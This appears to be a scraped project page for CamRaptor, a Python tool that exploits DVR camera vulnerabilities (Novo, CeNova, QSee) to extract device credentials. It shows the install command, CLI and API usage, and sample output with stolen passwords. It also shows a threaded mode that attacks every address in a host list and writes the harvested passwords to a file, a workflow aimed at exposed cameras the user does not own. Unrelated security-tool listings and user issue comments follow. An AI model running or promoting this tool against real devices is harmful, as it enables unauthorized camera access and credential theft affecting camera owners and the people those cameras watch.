CamRaptor is a tool that exploits several vulnerabilities in popular DVR cameras to obtain device credentials.

Related tags

Security related resourcesiotcameraexploitpayloadkalilinuxcamera-hackingentysec
Overview

CamRaptor

CamRaptor is a tool that exploits several vulnerabilities in popular DVR cameras to obtain device credentials.

Features

  • Exploits vulnerabilities in most popular camera models such as Novo, CeNova and QSee.
  • Optimized to exploit multiple cameras at one time from list with threading enabled.
  • Simple CLI and API usage.

Installation

pip3 install git+https://github.com/EntySec/CamRaptor

Basic usage

To use CamRaptor just type camraptor in your terminal.

usage: camraptor [-h] [--threads] [--output OUTPUT] [--input INPUT]
                 [--address ADDRESS]

CamRaptor is a tool that exploits several vulnerabilities in popular DVR
cameras to obtain device credentials.

optional arguments:
  -h, --help         show this help message and exit
  --threads          Use threads for fastest work.
  --output OUTPUT    Output result to file.
  --input INPUT      Input file of addresses.
  --address ADDRESS  Single address.

Examples

Let's hack my camera just for fun.

camraptor --address 192.168.99.100

output:

[*] (192.168.99.100) - connecting to device...
[*] (192.168.99.100) - accessing device rom...
[*] (192.168.99.100) - extracting camera credentials...
[i] (192.168.99.100) - admin:mamahacker123

Let's try to use opened database of hosts with --threads for fast exploitation.

camraptor --threads --input cameras.txt --output passwords.txt

It will exploit all cameras in cameras.txt list by their addresses and save all obtained passwords to passwords.txt.

output:

[*] Initializing thread #0...
[*] (x.x.x.x) - connecting to camera...
[*] Initializing thread #1...
[*] (x.x.x.x) - connecting to camera...
[*] Initializing thread #2...
[*] (x.x.x.x) - connecting to camera...
[*] (x.x.x.x) - accessing camera config...
[*] (x.x.x.x) - extracting camera credentials...
[i] Thread #0 completed.
[*] (x.x.x.x) - connecting to camera...
[*] (x.x.x.x) - accessing camera config...
[*] (x.x.x.x) - extracting camera credentials...
[i] Thread #1 completed.
[*] (x.x.x.x) - connecting to camera...
[*] (x.x.x.x) - accessing camera config...
[*] (x.x.x.x) - extracting camera credentials...
[i] Thread #2 completed.

CamRaptor API

CamRaptor also has their own Python API that can be invoked by importing CamRaptor to your code:

from camraptor import CamRaptor

Basic functions

There are all CamRaptor basic functions that can be used to exploit specified device.

  • connect(host) - Connect specified defice by netword address.
  • exploit(device) - Exploit connected device.

Examples

from camraptor import CamRaptor

camraptor = CamRaptor()

camera = camraptor.connect('192.168.99.100')
print(camraptor.exploit(camera))

output:

'mamahacker123'
You might also like...
A Python Tool that uses Shodan API's to perform quick recon for vulnerabilities

Shodan Quick Recon A Python Tool that uses Shodan API's to perform quick recon for vulnerabilities Configuration You must edit the python code, and in

Black Hat Ethical Hacking 5 Aug 9, 2022
WpDisect is a wordpress hacking tool that finds vulnerabilities in wordpress.

wpdisect WpDisect is a wordpress hacking tool that finds misconfigurations in wordpress. Prerequisites You need to download wordpress in the wpdisect

null 3 Feb 20, 2022
ORector - A Fast Python tool designed to detect open redirects vulnerabilities on websites
ORector - A Fast Python tool designed to detect open redirects vulnerabilities on websites

ORector is a Fast Python tool designed to detect open redirects vulnerabilities

null 11 Apr 2, 2022
Tool for finding PHP source code vulnerabilities.

vulnz Tool for finding php source code vulnerabilities. Scans PHP source code and prints out potentially dangerous lines. This tool is useful for secu

Mateo Hanžek 1 Jan 14, 2022
Tool to scan for RouterOS (Mikrotik) forensic artifacts and vulnerabilities.

RouterOS Scanner Forensics tool for Mikrotik devices. Search for suspicious properties and weak security points that need to be fixed on the router. T

Microsoft 823 Dec 21, 2022
A simple tool to audit Unix/*BSD/Linux system libraries to find public security vulnerabilities
A simple tool to audit Unix/*BSD/Linux system libraries to find public security vulnerabilities

master_librarian A simple tool to audit Unix/*BSD/Linux system libraries to find public security vulnerabilities. To install requirements: $ sudo pyth

CoolerVoid 167 Dec 19, 2022
Python library to remotely extract credentials on a set of hosts.
Python library to remotely extract credentials on a set of hosts.

Python library to remotely extract credentials on a set of hosts.

Pixis 1.5k Dec 31, 2022
Having a weak password is not good for a system that demands high confidentiality and security of user credentials

Having a weak password is not good for a system that demands high confidentiality and security of user credentials. It turns out that people find it difficult to make up a strong password that is strong enough to prevent unauthorized users from memorizing it.

PyLaboratory 0 Feb 7, 2022
Safety checks your installed dependencies for known security vulnerabilities
Safety checks your installed dependencies for known security vulnerabilities

Safety checks your installed dependencies for known security vulnerabilities. By default it uses the open Python vulnerability database Safety DB, but

pyup.io 1.4k Dec 30, 2022
Comments
  • Difference between CamRaptor and CamOver

    Difference between CamRaptor and CamOver

    Hi,

    I tried both tools, and I don't see any difference between them.

    Can you tell me are there any differences between them, and which one to install ?

    Regards,

    opened by ghost 3
  • Can't open it

    Can't open it

    I have the same problem as the other that is closed, is that I can't open it by typing camraptor on the shell, but i don't know how to fix it, if someone can explain it , thanks

    opened by axel9925 1
  • Can't use camraptor.

    Can't use camraptor.

    There might be a simple solutions for this but as I am new to some of these tools I was not able to start camraptor just by typing it in my terminal. Any suggestions on what I need to do ?

    opened by csan6529 0
Releases(1.0.0)
Owner
EntySec
EntySec is a group of security professionals and software engineers involved in the development of security tools and services.
EntySec
GitHub Repository http://entysec.netlify.app
The Multi-Tool Web Vulnerability Scanner.

🟥 RapidScan v1.2 - The Multi-Tool Web Vulnerability Scanner RapidScan has been ported to Python3 i.e. v1.2. The Python2.7 codebase is available on v1

skavngr 1.3k Dec 31, 2022
Archive-Crack - A Tools for crack file archive

Install In TERMUX apt update && apt upgrade -y pkg install python git unrar

X - MrG3P5 10 Oct 06, 2022
Mass scan for .git repository and .env file exposure

Mass .Git repository and .Env file Scan by Scarmandef Scanner to find .env file and .git repository exposure on multiple hosts Because of the response

8 Jun 23, 2022
A proxy server application written in python for trial purposes

python-proxy-server This is a proxy server ❤️ application written in python ❤️ for trial purposes. The purpose of the application; Connecting to Hacke

Ali Kasimoglu 2 Dec 27, 2021
Kunyu, more efficient corporate asset collection

Kunyu(坤舆) - More efficient corporate asset collection English | 中文文档 0x00 Introduce Tool introduction Kunyu (kunyu), whose name is taken from , is act

Knownsec, Inc. 772 Jan 05, 2023
Python Library For Ethical Hacker

Python Library For Ethical Hacker

11 Nov 03, 2022
Proof of concept GnuCash Webinterface

Proof of Concept GnuCash Webinterface This may one day be a something truly great. Milestones [ ] Browse accounts and view transactions [ ] Record sim

Josh 14 Dec 28, 2022
PoC for CVE-2021-45897 aka SCRMBT-#180 - RCE via Email-Templates (Authenticated only) in SuiteCRM <= 8.0.1

CVE-2021-45897 PoC for CVE-2021-45897 aka SCRMBT-#180 - RCE via Email-Templates (Authenticated only) in SuiteCRM = 8.0.1 This vulnerability was repor

Manuel Zametter 17 Nov 09, 2022
Check for breached passwords with k-anonymity

passwnd Check for breached passwords with k-anonymity Usage To get prompted to enter the password securely, simply run: passwnd.py Alternatively, you

Nat 1 Feb 08, 2022
Unsafe Twig processing of static pages leading to RCE in Grav CMS 1.7.10

CVE-2021-29440 Unsafe Twig processing of static pages leading to RCE in Grav CMS 1.7.10 Grav is a file based Web-platform. Twig processing of static p

Enox 6 Oct 10, 2022
Cobalt Strike < 4.4 dos CVE-2021-36798

CVE-2021-36798 CVE-2021-36798 Cobalt Strike 4.3 dos 用法 python3 CVE-2021-36798.py BeaconURL 打瘫Cobalt Strike 只需要一个包 已测试 4.3 4.2 参考: https://labs.sent

37 Nov 09, 2022
Repo for The Crown: Exploratory Analysis of Nim Malware DEF CON 615 talk

Repo for "The Crown: Exploratory Analysis of Nim Malware" DEF CON 615 talk

HuskyHacks 43 Dec 03, 2022
Set the draft security HTTP header Permissions-Policy (previously Feature-Policy) on your Django app.

django-permissions-policy Set the draft security HTTP header Permissions-Policy (previously Feature-Policy) on your Django app. Requirements Python 3.

Adam Johnson 76 Nov 30, 2022
LittleBrother is a simple parental control application monitoring specific processes on Linux hosts to monitor and limit the play time of children.

Parental Control Application LittleBrother Overview LittleBrother is a simple parental control application monitoring specific processes (read "games"

40 Dec 21, 2022
A script to extract SNESticle from Fight Night Round 2

fn22snesticle.py A script for producing a SNESticle ISO from a Fight Night Round 2 ISO and any SNES ROM. Background Fight Night Round 2 is a boxing ga

Johannes Holmberg 57 Nov 22, 2022
Scans for Log4j versions effected by CVE-2021-44228

check_mkExtension to check for log4j2 CVE-2021-44228 This Plugin wraps around logpresso/CVE-2021-44228-Scanner (Apache License 2.0) How it works Run i

inett GmbH 4 Jun 30, 2022
A simple Burp Suite extension to extract datas from source code

DataExtractor A simple Burp Suite extension to extract datas from source code. Features in scope parsing file extensions to ignore files exclusion bas

Gwendal Le Coguic 86 Dec 31, 2022
POC using subprocess lib in Python 🐍

POC subprocess ☞ POC using the subprocess library with Python. References: https://github.com/GuillaumeFalourd/poc-subprocess https://geekflare.com/le

Guillaume Falourd 2 Nov 28, 2022
log4j2 dos exploit,CVE-2021-45105 exploit,Denial of Service poc

说明 about author: 我超怕的 blog: https://www.cnblogs.com/iAmSoScArEd/ github: https://github.com/iAmSOScArEd/ date: 2021-12-20 log4j2 dos exploit log4j2 do

3 Aug 13, 2022
Transparent proxy server that works as a poor man's VPN. Forwards over ssh. Doesn't require admin. Works with Linux and MacOS. Supports DNS tunneling.

sshuttle: where transparent proxy meets VPN meets ssh As far as I know, sshuttle is the only program that solves the following common case: Your clien

9.4k Jan 04, 2023